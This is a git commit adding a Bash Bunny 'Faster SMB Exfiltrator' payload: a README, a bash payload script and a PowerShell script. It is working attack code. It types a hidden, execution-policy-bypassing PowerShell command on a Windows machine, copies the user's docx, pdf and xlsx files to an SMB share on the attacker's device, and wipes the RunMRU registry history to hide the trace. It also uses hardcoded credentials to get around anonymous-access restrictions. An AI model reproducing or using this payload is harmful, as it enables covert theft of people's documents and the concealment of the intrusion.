commit
50e3d0639f
|
@ -0,0 +1,50 @@
|
||||||
|
# Faster SMB Exfiltrator V 2.0
|
||||||
|
|
||||||
|
* Author: Hak5Darren
|
||||||
|
* Props: ImNatho, mike111b, madbuda, jblk01
|
||||||
|
* Version: Version 1.6.1
|
||||||
|
* Target: Windows XP SP3+ (Powershell)
|
||||||
|
* Category: Exfiltration
|
||||||
|
* Attackmodes: HID, Ethernet
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
Exfiltrates select files from users's documents folder via SMB.
|
||||||
|
Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME
|
||||||
|
|
||||||
|
## Configuration
|
||||||
|
|
||||||
|
Configured to copy docx, pdf, and xlsx files by default. Change $exfil_ext# in s.ps1 to desired.
|
||||||
|
|
||||||
|
## STATUS
|
||||||
|
|
||||||
|
| LED | Status |
|
||||||
|
| ------------------- | -------------------------------------- |
|
||||||
|
| Red (blinking) | Impacket not found in /pentest |
|
||||||
|
| Yellow Single | Ethernet Stage |
|
||||||
|
| Yellow Double | HID Stage |
|
||||||
|
| Cyan | Receiving files |
|
||||||
|
| White | Moving liberated files to mass storage |
|
||||||
|
| Green | Finished |
|
||||||
|
|
||||||
|
# NOTICE
|
||||||
|
|
||||||
|
As of May 2019, Microsoft has disabled both SMB version 2 along with disallowing anonymous access to an SMB share.
|
||||||
|
To fix this, first follow these instructions, then you may use both the payload.txt and the s.ps1 files.
|
||||||
|
|
||||||
|
# Starting from a fresh Bash Bunny
|
||||||
|
|
||||||
|
1. apt update ; apt install gcc
|
||||||
|
2. pip install impacket
|
||||||
|
3. cd /tools/
|
||||||
|
4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
|
||||||
|
5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
|
||||||
|
6. python impacket/examples/smbserver - ## You should see entries for both a '-username' and a '-password'
|
||||||
|
|
||||||
|
Both the username and the password have been set as 'user' and 'Password01' respectively.
|
||||||
|
|
||||||
|
# Changes to the payload.txt include:
|
||||||
|
|
||||||
|
* Support for SMB version 2 enabled.
|
||||||
|
* Username and password set to bypass Microsoft's disallowing of anonymous access.
|
||||||
|
* Authentication to said SMB share with credentials specified in both the payload.txt and s.ps1 files.
|
|
@ -0,0 +1,85 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: Faster SMB Exfiltrator version 2.0
|
||||||
|
# Author: Hak5Darren
|
||||||
|
# Props: ImNatho, mike111b, madbuda, jblk01
|
||||||
|
# Version: 1.6.1
|
||||||
|
# Category: Exfiltration
|
||||||
|
# Target: Windows XP SP3+ (Powershell)
|
||||||
|
# Attackmodes: HID, Ethernet
|
||||||
|
#
|
||||||
|
# REQUIREMENTS
|
||||||
|
# ============
|
||||||
|
# SETUP:
|
||||||
|
#
|
||||||
|
# 1. apt update ; apt install gcc
|
||||||
|
# 2. pip install impacket
|
||||||
|
# 3. cd /tools/
|
||||||
|
# 4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
|
||||||
|
# 5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# LED STATUS
|
||||||
|
# ==========
|
||||||
|
# FAIL........Failed to find dependencies
|
||||||
|
# STAGE1......Ethernet Stage
|
||||||
|
# STAGE2......HID Stage
|
||||||
|
# SPECIAL.....Receiving Files
|
||||||
|
# CLEANUP.....Moving Liberated Files
|
||||||
|
# FINISH......Finished
|
||||||
|
#
|
||||||
|
# OPTIONS
|
||||||
|
# =======
|
||||||
|
# Exfiltration options configured from included s.ps1 script
|
||||||
|
|
||||||
|
|
||||||
|
######## INITIALIZATION ########
|
||||||
|
REQUIRETOOL impacket
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
# Make temporary loot directory
|
||||||
|
mkdir -p /loot/smb/
|
||||||
|
# Delete any old exfiltration data
|
||||||
|
rm -rf /loot/smb/*
|
||||||
|
# Copy new powershell payload to smb share
|
||||||
|
cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/
|
||||||
|
# Make loot directory on USB Disk
|
||||||
|
mkdir -p /root/udisk/loot/smb_exfiltrator
|
||||||
|
|
||||||
|
|
||||||
|
######## ETHERNET STAGE ########
|
||||||
|
LED STAGE1
|
||||||
|
ATTACKMODE RNDIS_ETHERNET
|
||||||
|
# Start the SMB Server
|
||||||
|
python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log &
|
||||||
|
|
||||||
|
|
||||||
|
######## HID STAGE ########
|
||||||
|
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1
|
||||||
|
GET HOST_IP
|
||||||
|
LED STAGE2
|
||||||
|
ATTACKMODE HID RNDIS_ETHERNET
|
||||||
|
RUN WIN powershell
|
||||||
|
Q DELAY 1000
|
||||||
|
Q STRING powershell -windowstyle hidden -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit"
|
||||||
|
Q DELAY 500
|
||||||
|
Q ENTER
|
||||||
|
LED SPECIAL
|
||||||
|
# Wait until files are done copying
|
||||||
|
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done
|
||||||
|
|
||||||
|
|
||||||
|
######## CLEANUP ########
|
||||||
|
LED CLEANUP
|
||||||
|
# Delete EXFILTRATION_COMPLETE file
|
||||||
|
rm -rf /loot/smb/EXFILTRATION_COMPLETE
|
||||||
|
# Move files to udisk loot directory
|
||||||
|
mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator
|
||||||
|
# Clean up temporary loot directory
|
||||||
|
rm -rf /loot/smb/e/*
|
||||||
|
# Sync file system
|
||||||
|
sync
|
||||||
|
|
||||||
|
|
||||||
|
######## FINISH ########
|
||||||
|
# Trap is clean
|
||||||
|
LED FINISH
|
|
@ -0,0 +1,9 @@
|
||||||
|
$exfil_dir="$Env:UserProfile\Documents"
|
||||||
|
$exfil_ext="*.docx"
|
||||||
|
$exfil_ext1="*.pdf"
|
||||||
|
$exfil_ext2="*.xlsx"
|
||||||
|
$loot_dir="\\172.16.64.1\s\e\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))"
|
||||||
|
mkdir $loot_dir
|
||||||
|
robocopy $exfil_dir $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 /S /MT /Z
|
||||||
|
New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
|
||||||
|
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
|
Loading…
Reference in New Issue